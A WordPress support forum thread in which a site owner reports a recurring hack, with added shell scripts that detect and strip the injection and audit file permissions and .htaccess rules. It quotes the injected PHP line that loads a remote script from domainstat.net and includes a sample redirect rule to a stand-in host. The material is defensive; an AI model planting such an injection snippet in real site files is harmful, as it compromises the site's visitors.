• orchidred

    (@orchidred)


    My site has been hacked twice this month and I can't figure out how. It begins with my-hacks.php, where WP tells me that headers were already sent. Opening my-hacks reveals that this bit of code has somehow been added to the file:

    <? if (!defined('domainstat')) { define("domainstat", "ok"); echo "<script language='JavaScript' type='text/javascript' src='https://domainstat.net/stat.php'></script>";}?>

    Deleting that bit of code causes all my plugin and admin.php files to stop working, and stylesheet.css stops working. The last time this happened the hack got progressively worse, eventually changing all my post links to a new link that sent people to a hardcore porno video.

    How is this happening? Anyone know how I can prevent it? Fix it?? HELP!!
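
The injected block quoted above can be hunted and stripped across a site tree with a few shell commands. The script below is an added example, not code from this thread or from WordPress: it assumes the marker string `domainstat` (taken from the snippet) identifies infected files, builds a constructed sample tree for the demo, and keeps a `.bak` copy of every file before editing it.

```shell
#!/bin/sh
# Added example, not from the thread: locate PHP files carrying the injected
# "domainstat" snippet quoted above and strip that block, keeping a .bak copy.
# The marker string and the sample tree below are assumptions for the demo.

MARKER='domainstat'

# Print every *.php under $1 that contains the marker.
find_infected() {
    find "$1" -type f -name '*.php' -exec grep -lF "$MARKER" {} + 2>/dev/null || true
}

# Remove each "<? ... domainstat ... ?>" block from $1, writing $1.bak first.
# The match is bounded by the PHP open/close tags, so unrelated code on the
# same line survives; it assumes the injected block contains no other '?'.
strip_snippet() {
    cp "$1" "$1.bak"
    sed -E 's/<\?[^?]*'"$MARKER"'[^?]*\?>//g' "$1.bak" > "$1"
}

# Build a constructed sample tree: one clean file, one carrying the snippet.
make_demo() {
    d=$(mktemp -d)
    printf '%s\n' '<?php' 'echo "clean";' > "$d/clean.php"
    printf '%s\n' \
        "<? if (!defined('domainstat')) { define(\"domainstat\", \"ok\"); echo \"<script language='JavaScript' type='text/javascript' src='https://domainstat.net/stat.php'></script>\";}?>" \
        '<?php' \
        '// my-hacks.php: legitimate content follows' > "$d/my-hacks.php"
    echo "$d"
}

# Walk a tree: strip the block from each infected file and report it.
clean_tree() {
    find_infected "$1" | while read -r f; do
        strip_snippet "$f"
        echo "cleaned $f"
    done
}
```

Run `clean_tree /path/to/site` against the install; re-run `find_infected` afterwards to confirm nothing still matches. Stripping the snippet does not address how it got there, so the files will be rewritten again until the writable-permissions or host-side problem discussed later in the thread is dealt with.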

Viewing 15 replies - 16 through 30 (of 65 total)
  • whooami

    (@whooami)

    FYI, on your blog site the permalinks as well as the comment links are prompting me to download a .wmv file (Windows Media file), and nope, I'm not up for being a guinea pig and seeing what it is. I appear to be doing this as you're messing with things, since it has just stopped; but looking at your source it looks like you put back the snippet of JS in the header, as they all appear to be working normally, but loading rather slowly.

    By the way, these sorts of JavaScript issues are becoming a recurring topic on the forums, again:

    NO FILES SHOULD BE CHMOD 666 OR 777 AS A RULE (ON ANY SITE, REGARDLESS OF WHAT SOFTWARE OR APPLICATIONS YOU ARE USING).

    WordPress allows you to edit files via the admin area, but trust me when I say that that's a huge issue, as it requires world-writable files. If you are insistent on editing files that way, it is best that you do it, and then chmod any files you edited back to the correct permissions (644 or 755, respectively).

    It's worth noting also that wp-cache, I presume, requires a whole directory's worth of files to be world-writable.

    Thread Starter orchidred

    (@orchidred)

    — deleted, duplicate post —-

    Thread Starter orchidred

    (@orchidred)

    Whooami, that wmv file is a porno video, that’s the same thing that happened the last time my site was hacked.

    As for messing with the site, that’s really disturbing that you said files are changing because I haven’t done anything to it since starting this thread. The only thing I did (before posting here) was delete the js, but it reappeared soon afterwards.

    Thread Starter orchidred

    (@orchidred)

    Orlo, yes please do email me. I can be reached at amadai at gmail dot com.

    Thread Starter orchidred

    (@orchidred)

    whooami, good to know. I'm definitely not going to edit files in WP anymore.

    whooami

    (@whooami)

    OrchidRed, I know.. which is why I'm not going to guinea pig it.. Good luck, I'm afraid it's snowing, and I am off to work..

    TechGnome

    (@techgnome)

    Have you looked to see if there's an .htaccess file? Someone may have dumped one there that's causing the redirects to the wmv file. It's just a guess though.

    -tg

    vkaryl

    (@vkaryl)

    Two possibles spring to mind, kestrel. Either you have totally pissed off the world’s greatest hacker (hopefully not, but if that’s it I don’t think we can help you!); or your host has some sort of security problem of their own (or a dodgy employee – not really likely, but has been known to happen….)

    If they put you on a new server, and you had nothing there BUT WP 1.5.2 (which so far and crossing fingers hasn’t any obvious open sores far as vulnerabilities go), it’s perhaps time to ask them again if they have a problem somewhere….

    TG has a good point as well: because if your first-hacked install was due to someone dropping a dirty .htaccess in your folder, you might have moved it along with your blog when you moved to the new server.

    Also, have you used phpMyAdmin to look at your database, to see if there are tables which don’t belong there?

    orlo

    (@orlo)

    I talked to kestrel, and it seems the provider has a bigger problem... the log file shows that some script is spreading across different clients/users on the same server, so I am not really sure if WP was the problem to start with... but changing the access rights should help a little... I think the provider will eventually figure it out ??

    seems like they are responding fast…

    As I said before, it seems like a couple of servers are affected (see Google)...

    vkaryl

    (@vkaryl)

    Ouch. Thanks for the report, orlo. Any chance you or kestrel would be willing to state which host, in case there are others who will be looking for info on the problem?

    moshu

    (@moshu)

    Among “others” consider this guy:
    https://www.ads-software.com/support/topic/50701#post-278892

    orlo

    (@orlo)

    The provider is looking at the issue on a general level, at least that was my understanding. They found a log file (created by the malicious script) which listed all files that were infected... seems like they are going through their servers right now...
    Maybe kestrel can tell you more as soon as they are done...

    JamesM

    (@righton)

    So if I email my host about this, they should be able to assist me you think?

    My issue is I have one of these scripts in front of my DOCTYPE, and it’s not visible in the template file… I can’t find it anywhere.

    Thread Starter orchidred

    (@orchidred)

    Hi all, sorry for not responding sooner I was at work and didn’t have computer access.

    My host thinks there is a file somewhere in the root folder of my server and that it has been systematically rewriting every WP file on the _entire_ server, so it’s not just my account. They think this is the case because they found a txt file that has been logging all the files that have been corrupted.

    It seems like it only rewrites WP files because non-WP php files haven’t been affected. (We’re guessing that it exploits the fact that many of them were CHMOD to 666 like whooami said?) It completely messes up the admin panel and turns comments/permalinks into links to a wmv porno file.

    That’s all I know. My host temporarily stopped the attack by freezing some folders, but they haven’t been able to find the file that is responsible for all this.

    vkaryl

    (@vkaryl)

    Well, if we don’t know which particular host is affected…. I would think this should be a general heads-up to EVERYONE to check over your file permissions and reset anything 666 or higher back to a “reasonable level” – 644 for files and 755 for folders….
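
A shell audit for the file-permission advice whooami gives above and vkaryl repeats here, with the .htaccess check TechGnome suggested folded in. This is an added example, not code from the thread or from WordPress; the sample tree, its paths and the rewrite rule in it are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the thread: audit a WordPress tree for the
# world-writable files and directories the posts above warn about, reset them
# to 644/755, and surface .htaccess directives that can redirect or inject.
# The sample tree and its paths are constructed for the demo.

# Print files and directories under $1 that are world-writable (o+w).
list_world_writable() {
    find "$1" \( -type f -o -type d \) -perm -002
}

# Reset world-writable files to 644 and directories to 755, printing each path.
# Only o+w entries are touched, so a file that was already 755 is left alone.
fix_perms() {
    find "$1" -type f -perm -002 -exec chmod 644 {} \; -print
    find "$1" -type d -perm -002 -exec chmod 755 {} \; -print
}

# Print, with file name and line number, .htaccess directives that redirect
# requests or change how PHP runs; every hit needs a human look.
scan_htaccess() {
    find "$1" -type f -name .htaccess -exec grep -HnE \
        '^[[:space:]]*(Redirect|RedirectMatch|RewriteRule|RewriteCond|ErrorDocument|php_value|php_flag|AddHandler|AddType|SetHandler)' {} + || true
}

# Constructed sample: a 777 directory, a 666 plugin file, and an .htaccess
# that rewrites every request to a .wmv, as described in the thread.
make_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/plugins"
    echo '<?php' > "$d/wp-content/plugins/plugin.php"
    printf '%s\n' 'RewriteEngine On' \
        'RewriteRule ^(.*)$ https://example.invalid/video.wmv [R,L]' > "$d/.htaccess"
    chmod 755 "$d/wp-content/plugins"
    chmod 777 "$d/wp-content"
    chmod 666 "$d/wp-content/plugins/plugin.php"
    chmod 644 "$d/.htaccess"
    echo "$d"
}

# Full audit: report, fix, then list .htaccess directives.
audit() {
    echo "== world-writable before =="; list_world_writable "$1"
    echo "== fixed =="; fix_perms "$1"
    echo "== .htaccess directives =="; scan_htaccess "$1"
}
```

Run `audit /path/to/site` as the account owner. The reset only clears the o+w bit, so a plugin such as the wp-cache whooami mentions, which expects a world-writable directory, will stop writing until it is given a directory of its own; the .htaccess scan only lists directives and never edits, because a rewrite to a remote .wmv and a legitimate permalink rule look alike to a regex.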

  • The topic ‘WP Hacked Twice’ is closed to new replies.